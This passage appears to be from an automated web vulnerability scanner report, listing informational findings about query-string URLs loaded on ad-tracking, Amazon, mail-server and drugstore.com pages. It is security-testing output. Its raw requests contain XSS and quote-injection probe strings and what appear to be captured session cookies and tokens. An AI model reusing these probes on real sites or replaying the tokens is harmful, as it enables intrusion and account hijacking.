href="http://yads.zedo.com/ads2/c?a=947253;x=2304;g=172;c=1133000173,1133000173;i=0;n=1133;i=0;u=k5xiThcyanucBq9IXvhSGSz5~090311;1=8;2=1;e=i;s=24;g=172;w=47;m=82;z=0.8216961014550179;p=6;f=1160000;h=1021994;k=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BEX0mCndzTsf0DcOJgALUrb3-BsL17uACur-rqCqi06q2TaCNBhABGAEgsLnXBjgAUIWt2Zv9_____wFgyQagAY6tjM0DsgEQcG9ydGFsLm9wZXJhLmNvbboBCjMwMHgyNTBfYXPIAQnaARhodHRwOi8vcG9ydGFsLm9wZXJhLmNvbS-4AhjAAgHIApqHwSCoAwHoA6UB6AMQ6AONA_UDAAgAAPUDMgCAAaAGEQ&num=1&sig=AOD64_2ztssrmiGfz4QREAFMwUEJdXtTPw&client=ca-pub-3796773913386149&adurl=http://srv2.healthheadlines.com/t.php?e=90186&a=AIvJnAAAADMAAAAJAAAAUgAAAGQAAAAFAAAABwAAAAUAAAG1AAAA&b=yAAAACIAAAGUAAAAKQAAAZQAAAEsAAAAFAAABJAAAAAaAAAAuQ%3D%3D&t=0&i=9&r=http%3A%2F%2Fwww.MyStagesofBeauty.com%2Fbridge%2Frad_srv_9%2F1133000173%2Fpid%3D300" target="_blank" title="Dermatologists' Best Kept Secret"> <img src="http://c2462832.r32.cf0.rackcdn.com/1168_SmokingWoman_80x60.jpg" width="80" height="60" alt="Dermatologists' Best Kept Secret" title="Dermatologists' Best Kept Secret" /> <div class="text_section">...[SNIP]...
15.42. http://t.tellapart.com/hif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://t.tellapart.com
Path:
/hif
Issue detail
The page was loaded from a URL containing a query string:http://t.tellapart.com/hif?p=vobmfNYCXJkpXrtb_UNRwyPDtCMLAAEAAAAQ8VfMRuCtWlGZKHGOFgAdYAsAAgAAABDBNWrL_D1gZ_QvSD7Ubh68CgADAAABMnMTUeAPAAQLAAAABAAAAAI5OQAAAAI3NQAAAAI3NAAAAAMxMDULAAUAAAAMZ01JVlhQT2pId09LAA==&tms=1316208686167 http://cm.g.doubleclick.net/pixel?google_nid=tellapart&google_cm=&google_sc=&uid=ABJeb19MQ_7Uvl3LediPd5VYoKAznog78C211xtoJO1-v9PWlDarwUa9vfv1WZD5CGRcKzdCsHmbHgEVX5_w8cJ_OROqoIUbHA http://tag.admeld.com/id?admeld_adprovider_id=359&external_user_id=ABJeb1-FawDa6eL3RoU1nlXDmyrqfHngwf1Rc3YvaUUbKYMhEYegahCht_ZBuy8Q6WjndNs5q3ghTHGdveqJNt-FQ_p9Ka6qOQ&expiration=7days&redirect=http://a.tellapart.com/admeldmatch?nid=[admeld_user_id]%26uid=ABJeb1-FawDa6eL3RoU1nlXDmyrqfHngwf1Rc3YvaUUbKYMhEYegahCht_ZBuy8Q6WjndNs5q3ghTHGdveqJNt-FQ_p9Ka6qOQ http://www.googleadservices.com/pagead/conversion.js http://www.googleadservices.com/pagead/conversion/1034755325/?label=DD5aCOXLhAQQ_bm07QM&guid=ON&script=0 http://www.googleadservices.com/pagead/conversion/1034755325/?label=EwF5CL297wEQ_bm07QM&guid=ON&script=0
Request
GET /hif?p=vobmfNYCXJkpXrtb_UNRwyPDtCMLAAEAAAAQ8VfMRuCtWlGZKHGOFgAdYAsAAgAAABDBNWrL_D1gZ_QvSD7Ubh68CgADAAABMnMTUeAPAAQLAAAABAAAAAI5OQAAAAI3NQAAAAI3NAAAAAMxMDULAAUAAAAMZ01JVlhQT2pId09LAA==&tms=1316208686167 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7O1GhjWGagkBZ8cNX0k4oxPsv8LF9nJWKu12mbgkeBMt_o6CvAURFeGEBSF8UxpLeFjWV5Q2eOlAeV7yVQxxfhVQ6n7tXCCk-3AaAr-3DeDS9cBGOjMik-CONnHvyl4pD3SI4onQ1Vx5D2OKkZQcrsaYTa28GPXtJ-72-twAilquinwVbDX2VnkhBOx2C9B; __cmbGU=ABJeb1_3NV-wS9CA4xNFiv3ShLSU4iGgty4u6k9WHsPFv60ohMiFdyhiaxwr6ZVfLN137aUZJTCXZJufx_taXD_Nnqj8E6TcGg; AWSELB=E31F5987121C4E93C56CFAE300CB3FAA8458B8275ED54EFB1FBFC3259C68A4A477202DDBEDB9857088204A944F7B0E0B304C51662855C88DA4DD00256DCA9F810994CC9BEC
Response
HTTP/1.1 200 OKCPogQjfO0UMPAAEMAAAABAsAAQAAAAI5OQoAAwAAATJzE1qmAAsAAQAAAAI3NQoAAwAAATJzE1qmAAsAAQAAAAI3NAoAAwAAATJzE1qmAAsAAQAAAAMxMDUKAAMAAAEycxNapgAA; expires=Wed, 14-Mar-2012 16:30:40 GMT; Path=/; Domain=.tellapart.com...[SNIP]... <img onload="pixelOnLoad('99');" src="http://tag.admeld.com/id?admeld_adprovider_id=359&external_user_id=ABJeb1-FawDa6eL3RoU1nlXDmyrqfHngwf1Rc3YvaUUbKYMhEYegahCht_ZBuy8Q6WjndNs5q3ghTHGdveqJNt-FQ_p9Ka6qOQ&expiration=7days&redirect=http://a.tellapart.com/admeldmatch?nid=[admeld_user_id]%26uid=ABJeb1-FawDa6eL3RoU1nlXDmyrqfHngwf1Rc3YvaUUbKYMhEYegahCht_ZBuy8Q6WjndNs5q3ghTHGdveqJNt-FQ_p9Ka6qOQ" border="0" width="1" height="1"> ...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> ...[SNIP]... <img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1034755325/?label=EwF5CL297wEQ_bm07QM&guid=ON&script=0"/> ...[SNIP]... <img onload="pixelOnLoad('74');" src="http://cm.g.doubleclick.net/pixel?google_nid=tellapart&google_cm=&google_sc=&uid=ABJeb19MQ_7Uvl3LediPd5VYoKAznog78C211xtoJO1-v9PWlDarwUa9vfv1WZD5CGRcKzdCsHmbHgEVX5_w8cJ_OROqoIUbHA" border="0" width="1" height="1"> ...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> ...[SNIP]... <img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1034755325/?label=DD5aCOXLhAQQ_bm07QM&guid=ON&script=0"/> ...[SNIP]...
15.43. http://tag.admeld.com/id
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tag.admeld.com
Path:
/id
Issue detail
The page was loaded from a URL containing a query string:http://tag.admeld.com/id?admeld_adprovider_id=359&external_user_id=ABJeb1-Z5UvDKkUi5ma-_eIDtPdj769QhY3pAZeJqT-2TO8o8tiFaZpjTOMunCtUftPiF9z-_DUqQue1_JjQUT2xPc7U-u4i5w&expiration=7days&redirect=http://a.tellapart.com/admeldmatch?nid=[admeld_user_id]%26uid=ABJeb1-Z5UvDKkUi5ma-_eIDtPdj769QhY3pAZeJqT-2TO8o8tiFaZpjTOMunCtUftPiF9z-_DUqQue1_JjQUT2xPc7U-u4i5w http://a.tellapart.com/admeldmatch?nid=642fefe9-2805-4880-8962-4149d004733c&uid=ABJeb1-Z5UvDKkUi5ma-_eIDtPdj769QhY3pAZeJqT-2TO8o8tiFaZpjTOMunCtUftPiF9z-_DUqQue1_JjQUT2xPc7U-u4i5w
Request
GET /id?admeld_adprovider_id=359&external_user_id=ABJeb1-Z5UvDKkUi5ma-_eIDtPdj769QhY3pAZeJqT-2TO8o8tiFaZpjTOMunCtUftPiF9z-_DUqQue1_JjQUT2xPc7U-u4i5w&expiration=7days&redirect=http://a.tellapart.com/admeldmatch?nid=[admeld_user_id]%26uid=ABJeb1-Z5UvDKkUi5ma-_eIDtPdj769QhY3pAZeJqT-2TO8o8tiFaZpjTOMunCtUftPiF9z-_DUqQue1_JjQUT2xPc7U-u4i5w HTTP/1.1/*;q=0.5;q=0.7/hif?p=vobmfNYCXJkpXrtb_UNRwyPDtCMLAAEAAAAQ8VfMRuCtWlGZKHGOFgAdYAsAAgAAABDBNWrL_D1gZ_QvSD7Ubh68CgADAAABMnMTUeAPAAQLAAAABAAAAAI5OQAAAAI3NQAAAAI3NAAAAAMxMDULAAUAAAAMZ01JVlhQT2pId09LAA==bd591%22%3balert(1)//e15fc9eb3e7&tms=1316208686167-4880-8962-4149d004733c; D41U=3O_LLE8-29DICImy9URHxcH9B6xRZqc42EETd2Ub_PUcwXum8NjMz_w
Response
HTTP/1.1 302 Moved Temporarily.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"/admeldmatch?nid=642fefe9-2805-4880-8962-4149d004733c&uid=ABJeb1-Z5UvDKkUi5ma-_eIDtPdj769QhY3pAZeJqT-2TO8o8tiFaZpjTOMunCtUftPiF9z-_DUqQue1_JjQUT2xPc7U-u4i5w<a href="http://a.tellapart.com/admeldmatch?nid=642fefe9-2805-4880-8962-4149d004733c&uid=ABJeb1-Z5UvDKkUi5ma-_eIDtPdj769QhY3pAZeJqT-2TO8o8tiFaZpjTOMunCtUftPiF9z-_DUqQue1_JjQUT2xPc7U-u4i5w"> here</a>...[SNIP]...
15.44. http://tag.admeld.com/id
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tag.admeld.com
Path:
/id
Issue detail
The page was loaded from a URL containing a query string:http://tag.admeld.com/id?admeld_adprovider_id=359&external_user_id=ABJeb19Jmj9tCokCusBAuXO6zTEU_j_StQm0L90KAByhufDR4AOmqPUBGDDqNjpgKn-i2TbM5fJ-P4iikei6iUVGfVa5jvfr9A&expiration=7days&redirect=http://a.tellapart.com/admeldmatch?nid=[admeld_user_id]%26uid=ABJeb19Jmj9tCokCusBAuXO6zTEU_j_StQm0L90KAByhufDR4AOmqPUBGDDqNjpgKn-i2TbM5fJ-P4iikei6iUVGfVa5jvfr9A http://a.tellapart.com/admeldmatch?nid=642fefe9-2805-4880-8962-4149d004733c&uid=ABJeb19Jmj9tCokCusBAuXO6zTEU_j_StQm0L90KAByhufDR4AOmqPUBGDDqNjpgKn-i2TbM5fJ-P4iikei6iUVGfVa5jvfr9A
Request
GET /id?admeld_adprovider_id=359&external_user_id=ABJeb19Jmj9tCokCusBAuXO6zTEU_j_StQm0L90KAByhufDR4AOmqPUBGDDqNjpgKn-i2TbM5fJ-P4iikei6iUVGfVa5jvfr9A&expiration=7days&redirect=http://a.tellapart.com/admeldmatch?nid=[admeld_user_id]%26uid=ABJeb19Jmj9tCokCusBAuXO6zTEU_j_StQm0L90KAByhufDR4AOmqPUBGDDqNjpgKn-i2TbM5fJ-P4iikei6iUVGfVa5jvfr9A HTTP/1.1/*;q=0.5;q=0.7/hif?p=vobmfNYCXJkpXrtb_UNRwyPDtCMLAAEAAAAQ8VfMRuCtWlGZKHGOFgAdYAsAAgAAABDBNWrL_D1gZ_QvSD7Ubh68CgADAAABMnMTUeAPAAQLAAAABAAAAAI5OQAAAAI3NQAAAAI3NAAAAAMxMDULAAUAAAAMZ01JVlhQT2pId09LAA==&tms=1316208686167-4880-8962-4149d004733c; D41U=3O_LLE8-29DICImy9URHxcH9B6xRZqc42EETd2Ub_PUcwXum8NjMz_w
Response
HTTP/1.1 302 Moved Temporarily.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"/admeldmatch?nid=642fefe9-2805-4880-8962-4149d004733c&uid=ABJeb19Jmj9tCokCusBAuXO6zTEU_j_StQm0L90KAByhufDR4AOmqPUBGDDqNjpgKn-i2TbM5fJ-P4iikei6iUVGfVa5jvfr9A<a href="http://a.tellapart.com/admeldmatch?nid=642fefe9-2805-4880-8962-4149d004733c&uid=ABJeb19Jmj9tCokCusBAuXO6zTEU_j_StQm0L90KAByhufDR4AOmqPUBGDDqNjpgKn-i2TbM5fJ-P4iikei6iUVGfVa5jvfr9A"> here</a>...[SNIP]...
15.45. http://widgetsplus.com/google_plus_widget.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://widgetsplus.com
Path:
/google_plus_widget.php
Issue detail
The page was loaded from a URL containing a query string:http://widgetsplus.com/google_plus_widget.php?pid=106933972856076071655&host=thehackernews.com&mbgc=f5f5f5&ww=310&mbc=cecece&bbc=3F79D5&bmobc=3b71c6&bbgc=4889F0&bmoc=3F79D5&bfc=FFFFFF&bmofc=ffffff&tlc=cecece&tc=6a6a6a&nc=6a6a6a&bc=6a6a6a&l=y&t=Add_me_on&fs=16&fsb=13&bw=100&b=s&ff=4&pc=4889F0 http://lh3.googleusercontent.com/-vpN4cWeHo7E/AAAAAAAAAAI/AAAAAAAACgw/tbJSsM4LhFY/photo.jpg?sz=200 http://plus.google.com/106933972856076071655 https://plus.google.com/106933972856076071655
Request
GET /google_plus_widget.php?pid=106933972856076071655&host=thehackernews.com&mbgc=f5f5f5&ww=310&mbc=cecece&bbc=3F79D5&bmobc=3b71c6&bbgc=4889F0&bmoc=3F79D5&bfc=FFFFFF&bmofc=ffffff&tlc=cecece&tc=6a6a6a&nc=6a6a6a&bc=6a6a6a&l=y&t=Add_me_on&fs=16&fsb=13&bw=100&b=s&ff=4&pc=4889F0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK-Agent/xhtml1/DTD/xhtml1-transitional.dtd">;charset=ut...[SNIP]... <img src="http://lh3.googleusercontent.com/-vpN4cWeHo7E/AAAAAAAAAAI/AAAAAAAACgw/tbJSsM4LhFY/photo.jpg?sz=200" width="60" height="60" id="profile_image"/> <a href="http://plus.google.com/106933972856076071655" id="wgp_name" target="_blank" onClick="recordOutboundLink(this, 'Name', 'thehackernews.com');return false;"> Mohit Kumar</a>_wrapper"><a href="https://plus.google.com/106933972856076071655" target="_blank" id="wgp_add_button" onClick="recordOutboundLink(this, 'Button', 'thehackernews.com');return false;"> Add to circles</a>...[SNIP]...
15.46. http://ws.amazon.com/widgets/q
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ws.amazon.com
Path:
/widgets/q
Issue detail
The page was loaded from a URL containing a query string:http://ws.amazon.com/widgets/q?rt=tf_sw&ServiceVersion=20070822&MarketPlace=US&ID=V20070822/US/opera-20/8002/238229ae-452b-41fb-b7b3-1913a7cb0733 http://wms.assoc-amazon.com/20070822/US/js/8002_7.js
Request
GET /widgets/q?rt=tf_sw&ServiceVersion=20070822&MarketPlace=US&ID=V20070822/US/opera-20/8002/238229ae-452b-41fb-b7b3-1913a7cb0733 HTTP/1.1;q=0.3.337409241.1315233673.1315233673.1315236916.2; __utmz=194891197.1315236916.2.2.utmccn=(referral)|utmcsr=aws-portal.amazon.com|utmcct=/gp/aws/html-forms-controller/contactus98dd2'%3bac3249871a9/aws-account-and-billing|utmcmd=referral; ct-main="?yScNOlWT31nv@QGPOP6MZlUTgEuPV67"; apn-user-id=ad436c0d-3f66-48df-8380-85023e358301; x-main="kYmMgX@s6zRSHrgXsrT2Jct5JsIxFj@7"; aws-ubid-main=189-0212498-8250436; aws-x-main=UsPqM6hqJEtppz2vUlxJzQS7UOORf9DA; session-token=SQF/NkehkGMk+jdlo6/NLXrRBtfG2aeSiUcxmLBxdBQ8cmJRMfNGlYkOX0a/N00l4OzAutqHvfb9FBh+fr8MF6/DdmBOr5uYhE9XOogb0pkADN6BRGFMatq2bldyvYdHA3jnepv+7Arl9xnJWdTft1/gFN5GixtGQVw8ONCdfFj7229gWrFCR/ylhyeHArd92XSZrR8ObUdlW6zcVvlI08NLUSNtliR/aHfv+MkySJE2G/JWqf7h9pFBH71guzzVfsd8zXeStVUwsLfl2A70Cg==; ubid-main=189-8322294-4852542; session-id-time=2082787201l; session-id=188-7348060-9795407
Response
HTTP/1.1 200 OK.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC ";charset=UTF-8:"opera-20","width":"615","inner_bkgd_color":"#FFFFFF","serviceVersion":"20070822","use_default_search_term":false,"...[SNIP]... <script charset="utf-8" type="text/javascript" src="http://wms.assoc-amazon.com/20070822/US/js/8002_7.js"> </script>...[SNIP]...
15.47. http://www.altn.com/Products/MDaemon-Email-Server-Windows/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.altn.com
Path:
/Products/MDaemon-Email-Server-Windows/
Issue detail
The page was loaded from a URL containing a query string:http://www.altn.com/Products/MDaemon-Email-Server-Windows/?gclid=CNC9_rqUoqsCFeUZQgodLn8qig http://www.mdaemon-mail-server.com/ http://www.mdaemon-mail-server.com/collateral/US/US-MDaemon-Archiving-QuickStartGuide.pdf http://www.mdaemon-mail-server.com/collateral/US/US-MDaemon-ComAgent-QuickStartGuide.pdf http://www.mdaemon-mail-server.com/collateral/US/US-MDaemon-Datasheet.pdf http://www.mdaemon-mail-server.com/collateral/US/US-MDaemon-QuickStartGuide.pdf http://www.mdaemon-mail-server.com/collateral/US/US-MDaemon-Webmail-QuickStartGuide.pdf http://www.mdaemon-mail-server.com/collateral/us/us-mdaemonpro-datasheet.pdf http://www.rim.com/ http://www.zoomerang.com/ http://www.zoomerang.com/Shared/Report/L22XZG54CT2Z/QuestionResultsWidget/check_7?width=177&bc=226DB1&bgc=CFE8FC&fc=000000&fs=10&rc=False&rp=True&trc=False&shn=True&tb=False&pr=False https://www.securitymetrics.com/images/sm_tested1.gif https://www.securitymetrics.com/site_certificate.adp?s=65%2e240%2e66%2e160&i=192108
Request
GET /Products/MDaemon-Email-Server-Windows/?gclid=CNC9_rqUoqsCFeUZQgodLn8qig HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/19...[SNIP]... <a target="_blank" href="http://www.mdaemon-mail-server.com"> <img title="What's New" height="500" alt="" width="177" border="0" src="/Images/Banners/MDaemon-BBedition_skyscraper.png" />...[SNIP]... <a target="_blank" onclick="pageTracker._link(this.href); return false;" href="http://www.mdaemon-mail-server.com"> <img id="btn_WhatsNew" title="What's New" height="34" alt="" width="110" border="0" name="btn_WhatsNew" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('btn_WhatsNew','','/Images/Buttons/btn...[SNIP]... <script type="text/javascript" src="http://www.zoomerang.com/Shared/Report/L22XZG54CT2Z/QuestionResultsWidget/check_7?width=177&bc=226DB1&bgc=CFE8FC&fc=000000&fs=10&rc=False&rp=True&trc=False&shn=True&tb=False&pr=False"> </script><noscript><a href="http://www.zoomerang.com/"> Online Surveys - Zoomerang.com</a>...[SNIP]... <a title="MDaemon Product Brochure (PDF)" target="_blank" href="http://www.mdaemon-mail-server.com/collateral/us/us-mdaemonpro-datasheet.pdf"> Data Sheet - MDaemon Messaging Server Pro (PDF)</a>...[SNIP]... <a title="Datasheet - MDaemon Messaging Server, BlackBerry Edition (PDF)" target="_blank" href="http://www.mdaemon-mail-server.com/collateral/US/US-MDaemon-Datasheet.pdf"> Data Sheet - MDaemon Messaging Server, BlackBerry<sup>...[SNIP]... <a title="MDaemon Quick Start Guide (PDF)" target="_blank" href="http://www.mdaemon-mail-server.com/collateral/US/US-MDaemon-QuickStartGuide.pdf"> MDaemon Installation - Quick Start Guide (PDF)</a>...[SNIP]... <a title="MDaemon Easy Archiving Quick Start Guide (PDF)" target="_blank" href="http://www.mdaemon-mail-server.com/collateral/US/US-MDaemon-Archiving-QuickStartGuide.pdf"> MDaemon Easy Archiving - Quick Start Guide (PDF)</a>...[SNIP]... <a title="MDaemon's Instant Messaging (ComAgent) Quick Start Guide (PDF)" target="_blank" href="http://www.mdaemon-mail-server.com/collateral/US/US-MDaemon-ComAgent-QuickStartGuide.pdf"> MDaemon's Instant Messaging (ComAgent) - Quick Start Guide (PDF)</a>...[SNIP]... <a title="Features - MDaemon's Webmail Client (WorldClient) (PDF)" target="_blank" href="http://www.mdaemon-mail-server.com/collateral/US/US-MDaemon-Webmail-QuickStartGuide.pdf"> MDaemon's Webmail Client (WorldClient) Features (PDF)</a>...[SNIP]... <a target="_blank" href="http://www.rim.com/"> <img title="Research In Motion" border="0" alt="Research In Motion" src="/Images/Logos/RIM_small.png" />...[SNIP]... <a target="_blank" href="https://www.securitymetrics.com/site_certificate.adp?s=65%2e240%2e66%2e160&i=192108"> <img style="VERTICAL-ALIGN: top" border="0" alt="SecurityMetrics for PCI Compliance, QSA, IDS, Penetration Testing, Forensics, and Vulnerability Assessment" src="https://www.securitymetrics.com/images/sm_tested1.gif" /> </a>...[SNIP]...
15.48. http://www.authsmtp.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.authsmtp.com
Path:
/
Issue detail
The page was loaded from a URL containing a query string:http://www.authsmtp.com/?gclid=CLTWt_OJoqsCFRRSgwod8HVslQ http://www.getonline.co.uk/ http://www.getonlinedesign.com/
Request
GET /?gclid=CLTWt_OJoqsCFRRSgwod8HVslQ HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <a href="http://www.getonline.co.uk"> Web hosting</a> by <a href="http://www.getonline.co.uk"> Get Online</a> and <a href="http://www.getonlinedesign.com/"> Web design</a> by <a href="http://www.getonlinedesign.com/"> Get Online Design</a>...[SNIP]...
15.49. http://www.drugstore.com/pharmacy/drugindex/rxsearch.asp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.drugstore.com
Path:
/pharmacy/drugindex/rxsearch.asp
Issue detail
The page was loaded from a URL containing a query string:http://www.drugstore.com/pharmacy/drugindex/rxsearch.asp?search=ess http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/css/assets.asp?catid=10663 http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/css/site.css?version=4 http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/css/site/0/CSSMenuImageReplacement.asp? http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/css/site/0/default.css?version=4 http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/footer/button_truste.gif http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/footer/hp_legal.gif http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/icons/button_bml.gif http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/icons/button_google.gif http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/pharmacy/expand.gif http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/pharmacy/search_result_bar.gif http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/sites/0/2sites1bag.gif http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/sites/0/ds_logo_context.gif http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/sites/0/dscm_button_checkout.gif http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/sites/0/favicon.ico http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/sites/0/icon_lenses.gif http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/sites/0/icon_list.gif http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/sites/0/icon_pharmacy.gif http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/sites/0/search_border_left.gif http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/sites/0/search_border_right.gif http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/spacer.gif http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/lookahead/prototype.min.js?v=1.4.0 http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/lookahead/scriptaculous.js?v=1.5.2 http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/shoprunner/edutl.js http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/shoprunner/shoprunner_init.js http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/web_analytics/s_code.js?v=0.1 http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/scripts.asp?v=0.4 http://drugstore.custhelp.com/ http://drugstore.custhelp.com/app/chat/chat_launch/c/504 http://drugstore.custhelp.com/cgi-bin/drugstore.cfg/php/enduser/ask.php?p_cv=3.501&p_pv=&p_prods=&p_cats=447%2C500%2C501&cat_lvl1=447&cat_lvl2=500&cat_lvl3=501 http://drugstore.custhelp.com/cgi-bin/drugstore.cfg/php/enduser/std_adp.php?p_faqid=512 http://privacy-policy.truste.com/click-with-confidence/wps/en/www.drugstore.com/seal_m http://www.facebook.com/drugstore.com http://www.paypal.com/en_US/i/logo/PayPal_mark_37x23.gif http://www.twitter.com/drugstoredotcom
Request
GET /pharmacy/drugindex/rxsearch.asp?search=ess HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7:7B1B08A6C5BF4A968C79C9BFB007FDD0:ssmstg55acliez55gebilj55; ASP.NET_SessionId=tujq4xeiqb4bta55tp0jzqna; drugstore%2Efish=UserID=57ABB42C1945443F8A38894F54FEB227; ABTests=07082011_tns_abtest=abtest_not_qualified@&20051228_entrypages=1@09/16/2011 9:30:24 AM&091211_GWP_YTC=1@09/16/2011 9:30:24 AM&040610_bizrate_beauty=1@09/16/2011 9:30:24 AM&030411_click2chat_dscm=1@09/16/2011 9:30:24 AM&110210_bizrate_VD=abtest_not_qualified@&20090319_ForeSee_Vision=abtest_not_qualified@&pdetails_ver2=1@09/16/2011 9:30:24 AM&20060410_bizrate=0@09/16/2011 9:30:24 AM&20070530_GoogleCheckout=1@09/16/2011 9:30:24 AM&aggregate_knowledge=1@09/16/2011 9:30:24 AM&ship_interrupt=2@09/16/2011 9:30:24 AM&05262011_ivd_ciba_25percent_off=abtest_not_qualified@; BIGipServerdscm_farm=2316609728.0.0000; s_sess=%20s_cc%3Dtrue%3B%20abtest%3DABTEST_20060410_bizrate%257C0%3B%20s_sq%3Ddrugstorecomglobalprod%253D%252526pid%25253Dotc%2525253Ahomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/sites/0/icon_search.gif%252526ot%25253DIMAGE%3B; s_vi=[CS]v1|2739BCD58514B3D4-4000018C2004D12D[CE]; _br_uid_1=uid%3D5299788113416%3A; __cmbDomTm=0; __cmbU=ABJeb1_3NV-wS9CA4xNFiv3ShLSU4iGgty4u6k9WHsPFv60ohMiFdyhiaxwr6ZVfLN137aUZJTCXZJufx_taXD_Nnqj8E6TcGg; __cmbTpvTm=1058
Response
HTTP/1.1 200 OK:7B1B08A6C5BF4A968C79C9BFB007FDD0:yonvhm55shpcsh45w02oevnl; domain=.drugstore.com; expires=Thu, 15-Jan-2037 08:00:00 GMT; path=/=2316609728.0.0000; expires=Fri, 16-Sep-2011 17:31:39 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]... -Type" content="text/css" /><link rel="stylesheet" media="screen" type="text/css" href="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/css/site.css?version=4" /> <link rel="stylesheet" type="text/css" href="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/css/assets.asp?catid=10663" /> <link rel="stylesheet" type="text/css" href="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/css/site/0/default.css?version=4" /> <link rel="shortcut icon" type="image/x-icon" href="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/sites/0/favicon.ico"/> <link rel="icon" type="image/x-icon" href="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/sites/0/favicon.ico"/> ...[SNIP]... adericon"><img src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/sites/0/icon_list.gif" border="0" alt="Your List" title="Your List"/> </span>...[SNIP]... <a id="help_url_general" href="http://drugstore.custhelp.com/" target="dshelp" onclick="javascript:window.open('http://drugstore.custhelp.com/','dshelp','width=800,height=550,scrollbars=yes,resizable=yes,status=no,menubar=yes,toolbar=no,location=no');return false;" title="help" rel="nofollow"class="globalnavdsaccountlinks"> help</a>...[SNIP]... ?catid=17008&trx=29982"><img src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/sites/0/2sites1bag.gif" class="gndsTwoSiteOneBag" alt="" /> </a>...[SNIP]... _28109&trxp1=0&trxp2=0&trxp3=1%7C1" onclick="TrackCheckoutClick('imgCheckOut', 'drugstorecomglobalprod', 'rx', '')" rel="nofollow" class="gndsshoppinglinks" style="color:#007dc3;"><img src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/sites/0/dscm_button_checkout.gif" style="width:82px; height:20px; border:none;" alt="checkout" /> </a>...[SNIP]... .drugstore.com"><img title="drugstore.com" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/sites/0/ds_logo_context.gif" border="0" hspace="0" vspace="0" alt="drugstore.com"/> </a></div><div class="gndsSearchLeftPadding"><img src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/sites/0/search_border_left.gif" border="0"/> </div>...[SNIP]... htPadding"><img src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/sites/0/search_border_right.gif" border="0"/> </div>...[SNIP]... lLinks"><img src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/sites/0/icon_pharmacy.gif" border="0" alt="pharmacy" title="pharmacy" /> </div>...[SNIP]... lLinks"><img src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/sites/0/icon_lenses.gif" border="0" alt="contact lenses" title="contact 